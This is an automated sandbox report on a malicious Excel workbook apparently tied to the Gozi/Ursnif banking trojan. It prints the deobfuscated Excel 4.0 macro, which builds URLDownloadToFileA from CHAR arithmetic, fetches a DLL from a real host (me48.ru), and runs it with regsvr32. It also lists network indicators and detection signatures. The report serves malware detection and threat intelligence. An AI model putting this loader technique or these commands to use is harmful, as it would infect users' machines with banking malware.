Analysis Report document-1444032431.xls

Overview

General Information

Sample Name: document-1444032431.xls
Analysis ID: 324312
MD5: 407b70bcaef4d41cc7f63ceb6412a692
SHA1: 2cc134d5c5ea93bbbb0212f8d692484cc76766bd
SHA256: 6bbfff6e9dd29269927c954da80d86b6f91928e2fd049a92a72dca9e08140bd1
Tags: gozi, SilentBuilder, ursnif, xls

Detection

Hidden Macro 4.0
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 532 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 1296 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: document-1444032431.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Source: document-1444032431.xls
Rule: JoeSecurity_HiddenMacro
Description: Yara detected hidden Macro 4.0 in Excel
Author: Joe Security

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis
    Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 532, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 1296

    Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: document-1444032431.xls, Virustotal: Detection: 35%
    Source: document-1444032431.xls, ReversingLabs: Detection: 44%

    Software Vulnerabilities:

    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe
    Source: global traffic, DNS query: name: me48.ru
    Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 188.225.24.87:80
    Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 188.225.24.87:80
    Source: Joe Sandbox View, IP Address: 188.225.24.87
    Source: global traffic, HTTP traffic detected:
      GET /ds/231120.gif HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: me48.ru
      Connection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
    Source: global traffic, HTTP traffic detected:
      GET /ds/231120.gif HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: me48.ru
      Connection: Keep-Alive
    Source: unknown, DNS traffic detected: queries for: me48.ru
    Source: document-1444032431.xls, String found in binary or memory: http://me48.ru/ds/231120.gif
    Source: regsvr32.exe, 00000003.00000002.2091881653.0000000001D40000.00000002.00000001.sdmp, String found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4, Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S T : 1 2 3 4 5 6 7
    Found Excel 4.0 Macro with suspicious formulas
    Source: document-1444032431.xls, Initial sample: CALL (4 matches)
    Source: document-1444032431.xls, Initial sample: EXEC
    Found obfuscated Excel 4.0 Macro
    Source: document-1444032431.xls, Initial sample: High usage of CHAR() function: 18
    Source: document-1444032431.xls, OLE indicator, VBA macros: true
    Source: document-1444032431.xls, type: SAMPLE, Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engine, Classification label: mal80.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\DADE0000
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRD143.tmp
    Source: document-1444032431.xls, OLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
    Source: C:\Windows\System32\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: document-1444032431.xls, Virustotal: Detection: 35%
    Source: document-1444032431.xls, ReversingLabs: Detection: 44%
    Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknown, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: Window Recorder, Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: unknown, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX (29 identical entries)

    HIPS / PFW / Operating System Protection Evasion:

    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match, File source: document-1444032431.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
    Execution: Scripting21, Exploitation for Client Execution23, At (Linux), At (Windows), Cron
    Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
    Privilege Escalation: Process Injection1, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
    Defense Evasion: Regsvr321, Masquerading1, Disable or Modify Tools1, Process Injection1, Scripting21
    Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
    Discovery: File and Directory Discovery1, System Information Discovery2, Query Registry, System Network Configuration Discovery, Remote System Discovery
    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
    Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
    Command and Control: Non-Application Layer Protocol2, Application Layer Protocol12, Ingress Tool Transfer2, Protocol Impersonation, Fallback Channels
    Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
    Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
    Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings

    Behavior Graph

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source: document-1444032431.xls, Detection: 35%, Scanner: Virustotal
    Source: document-1444032431.xls, Detection: 14%, Scanner: Metadefender
    Source: document-1444032431.xls, Detection: 45%, Scanner: ReversingLabs, Label: Document-Word.Backdoor.Quakbot

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    Source: me48.ru, Detection: 1%, Scanner: Virustotal

    URLs

    Source: http://me48.ru/ds/231120.gif, Detection: 0%, Scanner: URL Reputation, Label: safe (4 identical entries)
    Source: http://servername/isapibackend.dll, Detection: 0%, Scanner: Avira URL Cloud, Label: safe

    Domains and IPs

    Contacted Domains

    Name: me48.ru, IP: 188.225.24.87, Active: true, Malicious: false, Reputation: unknown

    Contacted URLs

    Name: http://me48.ru/ds/231120.gif, Malicious: false, Antivirus Detection: URL Reputation: safe (4 identical entries), Reputation: unknown

    URLs from Memory and Binaries

    Name: http://servername/isapibackend.dll, Source: regsvr32.exe, 00000003.00000002.2091881653.0000000001D40000.00000002.00000001.sdmp, Malicious: false, Antivirus Detection: Avira URL Cloud: safe, Reputation: low

    Contacted IPs

    Public

    IP: 188.225.24.87, Domain: unknown, Country: Russian Federation, ASN: 9123, ASN Name: TIMEWEB-ASRU, Malicious: false

    General Information

    Joe Sandbox Version: 31.0.0 Red Diamond
    Analysis ID: 324312
    Start date: 29.11.2020
    Start time: 05:40:34
    Joe Sandbox Product: CloudBasic
    Overall analysis duration: 0h 13m 24s
    Hypervisor based Inspection enabled: false
    Report type: full
    Sample file name: document-1444032431.xls
    Cookbook file name: defaultwindowsofficecookbook.jbs
    Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of new started processes analysed: 5
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Detection: MAL
    Classification: mal80.expl.evad.winXLS@3/5@1/1
    EGA Information: Failed
    HDC Information: Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    • Max analysis timeout: 720s exceeded, the analysis took too long
    • Exclude process from analysis (whitelisted): dllhost.exe

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    Match: 188.225.24.87
    Associated Sample Name / URL | Detection | Context
    • document-1421190491.xls | malicious | me48.ru/ds/231120.gif
    • document-1421190491.xls | malicious | me48.ru/ds/231120.gif
    • document-1473929595.xls | malicious | me48.ru/ds/231120.gif
    • document-1473929595.xls | malicious | me48.ru/ds/231120.gif
    • document-1484980114.xls | malicious | me48.ru/ds/231120.gif
    • document-1493705687.xls | malicious | me48.ru/ds/231120.gif
    • document-1484980114.xls | malicious | me48.ru/ds/231120.gif
    • document-1493705687.xls | malicious | me48.ru/ds/231120.gif
    • document-1495480491.xls | malicious | me48.ru/ds/231120.gif
    • document-1495480491.xls | malicious | me48.ru/ds/231120.gif
    • document-1466663902.xls | malicious | me48.ru/ds/231120.gif
    • document-1466663902.xls | malicious | me48.ru/ds/231120.gif
    • document-1470167594.xls | malicious | me48.ru/ds/231120.gif
    • document-1470167594.xls | malicious | me48.ru/ds/231120.gif
    • document-1470686903.xls | malicious | me48.ru/ds/231120.gif
    • document-1470686903.xls | malicious | me48.ru/ds/231120.gif
    • document-1500762737.xls | malicious | me48.ru/ds/231120.gif
    • document-1500762737.xls | malicious | me48.ru/ds/231120.gif
    • document-1474276477.xls | malicious | me48.ru/ds/231120.gif
    • document-1474276477.xls | malicious | me48.ru/ds/231120.gif

    Domains

    Match: me48.ru
    Associated Sample Name / URL | Detection | Context
    • document-1421190491.xls | malicious | 188.225.24.87
    • document-1421190491.xls | malicious | 188.225.24.87
    • document-1473929595.xls | malicious | 188.225.24.87
    • document-1473929595.xls | malicious | 188.225.24.87
    • document-1484980114.xls | malicious | 188.225.24.87
    • document-1493705687.xls | malicious | 188.225.24.87
    • document-1484980114.xls | malicious | 188.225.24.87
    • document-1493705687.xls | malicious | 188.225.24.87
    • document-1495480491.xls | malicious | 188.225.24.87
    • document-1495480491.xls | malicious | 188.225.24.87
    • document-1466663902.xls | malicious | 188.225.24.87
    • document-1466663902.xls | malicious | 188.225.24.87
    • document-1470167594.xls | malicious | 188.225.24.87
    • document-1470167594.xls | malicious | 188.225.24.87
    • document-1470686903.xls | malicious | 188.225.24.87
    • document-1470686903.xls | malicious | 188.225.24.87
    • document-1500762737.xls | malicious | 188.225.24.87
    • document-1500762737.xls | malicious | 188.225.24.87
    • document-1474276477.xls | malicious | 188.225.24.87
    • document-1474276477.xls | malicious | 188.225.24.87

    ASN

    Match: TIMEWEB-ASRU
    Associated Sample Name / URL | Detection | Context
    • document-1421190491.xls | malicious | 188.225.24.87
    • document-1421190491.xls | malicious | 188.225.24.87
    • document-1473929595.xls | malicious | 188.225.24.87
    • document-1473929595.xls | malicious | 188.225.24.87
    • document-1484980114.xls | malicious | 188.225.24.87
    • document-1493705687.xls | malicious | 188.225.24.87
    • document-1484980114.xls | malicious | 188.225.24.87
    • document-1493705687.xls | malicious | 188.225.24.87
    • document-1495480491.xls | malicious | 188.225.24.87
    • document-1495480491.xls | malicious | 188.225.24.87
    • document-1466663902.xls | malicious | 188.225.24.87
    • document-1466663902.xls | malicious | 188.225.24.87
    • document-1470167594.xls | malicious | 188.225.24.87
    • document-1470167594.xls | malicious | 188.225.24.87
    • document-1470686903.xls | malicious | 188.225.24.87
    • document-1470686903.xls | malicious | 188.225.24.87
    • document-1500762737.xls | malicious | 188.225.24.87
    • document-1500762737.xls | malicious | 188.225.24.87
    • document-1474276477.xls | malicious | 188.225.24.87
    • document-1474276477.xls | malicious | 188.225.24.87

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\19DE0000
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: data
    Category: dropped
    Size (bytes): 315324
    Entropy (8bit): 7.9856492764520395
    Encrypted: false
    SSDEEP: 6144:6lKAurFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MA:64ZFPM8R3AsB+bjej/9c9
    MD5: 5098DB7E9AC876AB80BB13F0D199EC54
    SHA1: 87C89FAE6CB09A5F2E25763EDAB3641E22D2AF59
    SHA-256: 1AC9B9774C12D533CF6B3F80B78251CDE6A12E62A6DC09AE9C0D20EE9C02C1F0
    SHA-512: DA95A8C9419C5194F3A17D9541E11F79589FE23452C064D825DC7BCA9B6557E9CA1FFD0A9DBC445BB876B8FB4F2C7947266DE40B4CF9BD3BE146D9196240DC87
    Malicious: false
    Reputation: low
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 12:41:41 2020, atime=Sun Nov 29 12:41:41 2020, length=8192, window=hide
    Category: dropped
    Size (bytes): 867
    Entropy (8bit): 4.457557297615232
    Encrypted: false
    SSDEEP: 12:85QwCLgXg/XAlCPCHaXgzB8IB/HMFvX+WnicvbQlbDtZ3YilMMEpxRljKPCTdJP8:85vU/XTwz6I5KvYeMZDv3q/rNru/
    MD5: 85449AD9E39559AAA2913C3D5B75E8EE
    SHA1: 71D1C8D27C92927E3C27BF9736684F85F27A876E
    SHA-256: D504FF974585C6C76E4C5F994446B5B18BDE5E36C844C924F909116642ADCE81
    SHA-512: DCF943CA81EC86612B5516113DA3E4FC8742B9CCEB6848A1FAA9C92DD40D0B9B0813E1B303B5AA7259308F031F371CB128C1498FE14E2ADA6EF661BE4AD79D4D
    Malicious: false
    Reputation: low
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1444032431.LNK
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Sun Nov 29 12:41:41 2020, atime=Sun Nov 29 12:41:41 2020, length=338432, window=hide
    Category: dropped
    Size (bytes): 4236
    Entropy (8bit): 4.49891639780458
    Encrypted: false
    SSDEEP: 96:86aM/XLIn6iUviU6/Qh26aM/XLIn6iUviU6/Qh26aM/XLIn6iUviU6/Qh26aM/X3:84In6faQE4In6faQE4In6faQE4In6fag
    MD5: B80D975D047F1AA4279B0549D4D95960
    SHA1: 0F2DB5792F52E1C1ED1496DF04BADB84357BCF27
    SHA-256: B6825E1117B6C8D7A00E14ECBDA9DF62D22B930CA0438A901624B5DA4D5944D8
    SHA-512: 963D7829032FD42B95FE4FB26BAC942232AF99F507A92E8A2A5809F24CCC11B548BFC0FEDD81CBCC164BD8AE1806A8A7693F632F31045D00EF5977DE8FBA21ED
    Malicious: false
    Reputation: low
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: ASCII text, with CRLF line terminators
    Category: modified
    Size (bytes): 232
    Entropy (8bit): 4.58632424408481
    Encrypted: false
    SSDEEP: 6:dj6Y9L1VQvgEL1VQvUY9L1VQvgEL1VQvUY9L1VQvgEL1VQvUY9L1VQvs:dmW0t0UW0t0UW0t0UW0s
    MD5: 3CEB26C40FD0AC18ECC71A36D42E6078
    SHA1: CAA999B067964E45D41696DD53A6D78878ACA641
    SHA-256: DD55EE5394A013AA69EAF59F7DB71C967225A96396171A9C0DD1D9700315A36B
    SHA-512: 06A791BC30754741CFE9D56BCF747020F71819CA14CAE78CBDF34F7419F1B14DA4BCDB474C5348D3C21673259621306BB7EC436A9D8AA4A55440AB4AD8EA761D
    Malicious: false
    Reputation: low
    Preview: Desktop.LNK=0..[xls]..document-1444032431.LNK=0..document-1444032431.LNK=0..[xls]..document-1444032431.LNK=0..document-1444032431.LNK=0..[xls]..document-1444032431.LNK=0..document-1444032431.LNK=0..[xls]..document-1444032431.LNK=0..
    C:\Users\user\Desktop\DADE0000
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: Applesoft BASIC program data, first line number 16
    Category: dropped
    Size (bytes): 398377
    Entropy (8bit): 7.195263540214216
    Encrypted: false
    SSDEEP: 6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdm:Oizo8RnsIROnr6n75Y+X
    MD5: 50D06354B55088E6C4857F8788A9FBA1
    SHA1: 86B6DF0209A857191D16A100EA7E82923A872983
    SHA-256: 8357E554575E759A89D792830F6B6593A2F579C78A6C9C208026DE0C79EAD2EE
    SHA-512: 27D1A70B281869C1A9F497247926DCCB1CD29DED5A522B54E199FBA12897872B8E2E8F581F0BF2BDC3A36F8C5401617C0473B5CDA9B371620D6CE12FC5C9756D
    Malicious: false
    Reputation: low

    Static File Info

    General

    File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:45:46 2020, Security: 0
    Entropy (8bit): 7.522918762403885
    TrID:
    • Microsoft Excel sheet (30009/1) 78.94%
    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
    File name: document-1444032431.xls
    File size: 338944
    MD5: 407b70bcaef4d41cc7f63ceb6412a692
    SHA1: 2cc134d5c5ea93bbbb0212f8d692484cc76766bd
    SHA256: 6bbfff6e9dd29269927c954da80d86b6f91928e2fd049a92a72dca9e08140bd1
    SHA512: b48aba642ff0d96d50a6833c4076c476aa4255caed3f83c032b0936cb0df910e5aae99211122e678388e5f1f05fe2a71a8a5a194bfd47d40f75ac170e1fa8227
    SSDEEP: 6144:YcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTa:Cizo8RnsIROnr6n75YV

    File Icon

    Icon Hash: e4eea286a4b4bcb4

    Static OLE Info

    General

    Document Type: OLE
    Number of OLE Files: 1

    OLE File "document-1444032431.xls"

    Indicators

    Has Summary Info: True
    Application Name: Microsoft Excel
    Encrypted Document: False
    Contains Word Document Stream: False
    Contains Workbook/Book Stream: True
    Contains PowerPoint Document Stream: False
    Contains Visio Document Stream: False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros: True

    Summary

    Code Page:1251
    Author:
    Last Saved By:
    Create Time:2006-09-16 00:00:00
    Last Saved Time:2020-11-26 09:45:46
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:917504

    Streams

    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.367004077607
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.254255489206
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326259
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:326259
    Entropy:7.65610249915
    Base64 Encoded:True
    Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
    Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

    Macro 4.0 Code

    CALL("Ke"&????2!HN342&"32", "Cr"&????2!HP370&"yA", "JCJ", ????2!HE340&????2!HE355, 0)
    
    CALL("U"&????2!HP360, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HE340&????2!HE355&????2!HE369, 0, 0)
    
    =RUN(R59)
    =RUN(????4!D50)
    =CALL("Ke"&????2!HN342&"32","Cr"&????2!HP370&"yA","JCJ",????2!HE340&????2!HE355,0)
    =RUN(????5!A50)
    =CALL("Ke"&????2!HN342&"32","Cr"&????2!HP370&"yA","JCJ",????2!HE340,0)
    =RUN(????1!M66)
    =CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)

    Row  Column E formula          F    G    H    Value
    66   =CHAR(SUM(F66,G66,H66))  25   35   25   85 (U)
    67   =CHAR(SUM(F67,G67,H67))  20   42   20   82 (R)
    68   =CHAR(SUM(F68,G68,H68))  25   26   25   76 (L)
    69   =CHAR(F69-G69-H69)       100  22   10   68 (D)
    70   =CHAR(F70-G70-H70)       200  50   39   111 (o)
    71   =CHAR(F71-G71-H71)       500  300  81   119 (w)
    72   =CHAR(F72+G72-H72)       120  130  140  110 (n)
    73   =CHAR(F73+G73-H73)       200  300  392  108 (l)
    74   =CHAR(F74+G74-H74)       400  500  789  111 (o)
    75   =CHAR(F75-G75+H75)       500  430  27   97 (a)
    76   =CHAR(F76-G76+H76)       310  270  60   100 (d)
    77   =CHAR(F77-G77+H77)       200  160  44   84 (T)
    78   =CHAR(SUM(F78,G78,H78))  56   37   18   111 (o)
    79   =CHAR(SUM(F79,G79,H79))  27   18   25   70 (F)
    80   =CHAR(SUM(F80,G80,H80))  44   58   3    105 (i)
    81   =CHAR(F81-G81-H81)       384  115  161  108 (l)
    82   =CHAR(F82-G82-H82)       762  504  157  101 (e)
    83   =CHAR(F83-G83-H83)       501  328  108  65 (A)

    Read in row order, the CHAR cells evaluate to URLDownloadToFileA (the value column is the arithmetic of each row's formula applied to its F, G and H cells).

    =CALL("U"&????2!HP360,"U"&????4!E65,"IICCII",0,????2!EE100,????2!HE340&????2!HE355&????2!HE369,0,0)
    =EXEC(????3!W36&????2!HE340&????2!HE355&????2!HE369)
    =HALT()

    Network Behavior

    Network Port Distribution

    TCP Packets

    Timestamp                            Source Port  Dest Port  Source IP      Dest IP
    Nov 29, 2020 05:41:28.855443954 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:41:28.910079956 CET  80           49167      188.225.24.87  192.168.2.22
    Nov 29, 2020 05:41:28.910273075 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:41:28.911406040 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:41:28.966334105 CET  80           49167      188.225.24.87  192.168.2.22
    Nov 29, 2020 05:41:29.961657047 CET  80           49167      188.225.24.87  192.168.2.22
    Nov 29, 2020 05:41:29.961832047 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:41:34.966869116 CET  80           49167      188.225.24.87  192.168.2.22
    Nov 29, 2020 05:41:34.967108011 CET  49167        80         192.168.2.22   188.225.24.87
    Nov 29, 2020 05:43:28.701821089 CET  49167        80         192.168.2.22   188.225.24.87
